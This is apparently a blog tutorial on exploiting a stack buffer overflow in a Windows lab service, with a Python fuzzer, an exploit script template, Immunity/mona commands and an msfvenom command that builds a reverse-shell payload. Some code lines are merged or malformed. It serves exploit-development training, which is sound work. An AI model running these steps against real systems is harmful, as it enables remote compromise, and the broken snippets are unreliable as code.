Steps To Exploit Buffer Overflow
2 min readApr 20, 2022
- First, you’ll need to install an immunity debugger on windows OS
- Load your executable binary file to the Immunity debugger
- Config your environment by setting your directory environment to the following
!mona config -set workingfolder c:\mona\%p
- Start the loaded service and go-ahead for your enumeration
Enumeration
- create a fuzzer script to check the length at which the service could crash.
#!/usr/bin/env python3import socket, time, sysip = "10.10.4.64" #change thisport = 9999 #change this
timeout = 5string = "A" * 100while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
- run fuzzer to see the length which crashes
python3 fuzzer.py
Exploitation
- crashing the replication and controlling the EIP register
- to generate a cyclic pattern use the following
- to see what length can crash the server use the fuzzer.py
- then generate a pattern with that length + plus
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
- set generated pattern into your payload exploit and restart the oscp and exploit
- Create a python script and paste the following content
import socketip = "10.10.4.64" #change this
port = 9999 # change thisoffset = 0
overflow = b"A" * offset
retn = b""
padding = b""
payload=()
postfix = b""buffer = overflow + retn + padding + payload + postfixprint(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
s.connect((ip, port))
print("Sending evil buffer...")
s.recv(1024)
s.recv(1024)
s.send(bytes(buffer + "\r\n"))
print("Done!")
except:
print("Could not connect.")
- now you can execute it
python3 exploit.py
- on the oscp find the created binary by using
!mona findmsp -distance len
- now you can update your exploit to the offset you got from the command and the payload to empty string and the return variable to ‘BBBB’ to run the script.
- generate byte array using mona and exclude the null byte (x00) by default
!mona bytearray -b "\x00"
- now generate a string of bad chars identical to the byte array. and put as a payload in your script
- restart oscp and execute your exploit script. note the address of ESP you got
!mona compare -f C:\mona\oscp\bytearray.bin -a <address>
- now you can remove those bad chars from your script and restart oscp and the exploit. note that not all outputs are bad chars they might affect the next chars.
- find the jumping point.
!mona jmp -r esp -cpb "\x00\x\x\x\- finds all "jmp esp" instructions with addresses that don't contain any of the bad chars specified
- choose an address and change your exploit retn value to the reversed address you got
- generate payload using Metasploit and set it to your exploit payload variable
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c
- copy and replace the payload
- set your padding value to some number in case you need additional space while you exploit
padding = "\x90" * 16
- exploit
python3 exploit.py